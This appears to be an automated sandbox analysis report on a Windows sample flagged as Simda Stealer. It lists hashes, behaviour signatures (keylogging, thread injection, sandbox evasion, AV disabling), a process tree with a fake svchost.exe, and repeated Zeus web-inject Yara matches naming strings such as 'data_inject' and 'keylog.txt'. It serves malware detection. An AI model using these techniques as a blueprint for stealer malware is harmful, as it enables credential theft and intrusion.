Edit tour

Windows Analysis Report
Bpfz752pYZ.exe

Overview

General Information

Sample name:	Bpfz752pYZ.exe renamed because original name is a hash value
Original sample name:	5de240159b639483fb3674e6289e946e7c304293.exe
Analysis ID:	1553809
MD5:	a1699b125470c94380386d6c0cf106b3
SHA1:	5de240159b639483fb3674e6289e946e7c304293
SHA256:	d7db5171f51590f6eb1f7250eb75203b68ea0e9ba29a60457776338c5a9c9dc3
Tags:	exeuser-NDA0E
Infos:

Detection

Simda Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Simda Stealer

AI detected suspicious sample

Allocates memory in foreign processes

Checks if browser processes are running

Contains VNC / remote desktop functionality (version string found)

Contains functionality to behave differently if execute on a Russian/Kazak computer

Contains functionality to capture and log keystrokes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)

Contains functionality to infect the boot sector

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Creates an undocumented autostart registry key

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking volume information)

Found evasive API chain checking for user administrative privileges

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

Machine Learning detection for sample

Monitors registry run keys for changes

Moves itself to temp directory

Queries Google from non browser process on port 80

Queries random domain names (often used to prevent blacklisting and sinkholes)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Tries to resolve many domain names, but no domain seems valid

Uses known network protocols on non-standard ports

Writes to foreign memory regions

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to create system tasks

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Executes massive DNS lookups (> 100)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (might use process or thread times for sandbox detection)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Tries to disable installed Antivirus / HIPS / PFW

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Bpfz752pYZ.exe (PID: 1596 cmdline: "C:\Users\user\Desktop\Bpfz752pYZ.exe" MD5: A1699B125470C94380386D6C0CF106B3)

svchost.exe (PID: 4888 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: AA278E2717BFC5593B570B9CC3D1270A)

NcYLgtXIKJgHj.exe (PID: 1656 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 3792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 704 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 3000 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 2788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 616 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 7992 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 916 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 3704 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 8040 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3704 -s 712 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 4828 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

NcYLgtXIKJgHj.exe (PID: 5576 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 760 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 4180 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 4568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 992 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 5376 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 7744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 696 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 4836 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 5344 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 936 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 8364 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 1444 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 5720 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 8488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 724 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NcYLgtXIKJgHj.exe (PID: 6008 cmdline: "C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2562028304.0000000001740000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000007.00000002.2554723271.0000000002FA0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.2644113860.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2710293683.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2651597551.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2640221225.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4dbf4:$a1: name=%s&port=%u 0x4d3c8:$a2: data_inject 0x4d57c:$a3: keylog.txt 0x4d25d:$a4: User-agent: %s]]] 0x4dd44:$a5: %s\%02d.bmp
00000002.00000003.2551297845.000000000ED00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2491630816.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2681109856.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000014.00000002.2584784821.00000000027D0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
0000001F.00000002.2699028400.0000000002790000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4c7f4:$a1: name=%s&port=%u 0x4bfc8:$a2: data_inject 0x4c17c:$a3: keylog.txt 0x4be5d:$a4: User-agent: %s]]] 0x4c944:$a5: %s\%02d.bmp
00000002.00000003.2688837088.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2681703821.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2682799870.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2646845259.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000016.00000002.2606518078.00000000005E0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.2693850041.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2694477664.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2610885248.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2667661376.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0000001F.00000002.2699100650.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2711656555.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
0000000A.00000002.2576688656.0000000001520000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2689917423.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4c9bc:$a1: name=%s&port=%u 0x4c190:$a2: data_inject 0x4c344:$a3: keylog.txt 0x4c025:$a4: User-agent: %s]]] 0x4cb0c:$a5: %s\%02d.bmp
00000002.00000003.2689093667.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2642349690.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000010.00000002.2538477716.0000000002A60000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000019.00000002.2629072397.0000000002B90000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000016.00000002.2610943205.0000000002340000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000002.3391913803.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x477f4:$a1: name=%s&port=%u 0x46fc8:$a2: data_inject 0x4717c:$a3: keylog.txt 0x46e5d:$a4: User-agent: %s]]] 0x47944:$a5: %s\%02d.bmp
0000000E.00000002.2558937111.0000000002920000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.2617323227.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2674089655.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2584410332.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000010.00000002.2535763642.0000000002790000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
00000022.00000002.2697002323.0000000002740000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2139570153.0000000002A50000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2685802942.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2642126160.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2712084966.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2696066198.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2711910580.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2684054026.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000007.00000002.2555462875.0000000003100000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47df4:$a1: name=%s&port=%u 0x475c8:$a2: data_inject 0x4777c:$a3: keylog.txt 0x4745d:$a4: User-agent: %s]]] 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2672453488.0000000002D30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x46bf4:$a1: name=%s&port=%u 0x463c8:$a2: data_inject 0x4657c:$a3: keylog.txt 0x4625d:$a4: User-agent: %s]]] 0x46d44:$a5: %s\%02d.bmp
00000006.00000002.2561383940.00000000016E0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48bf4:$a1: name=%s&port=%u 0x483c8:$a2: data_inject 0x4857c:$a3: keylog.txt 0x4825d:$a4: User-agent: %s]]] 0x48d44:$a5: %s\%02d.bmp
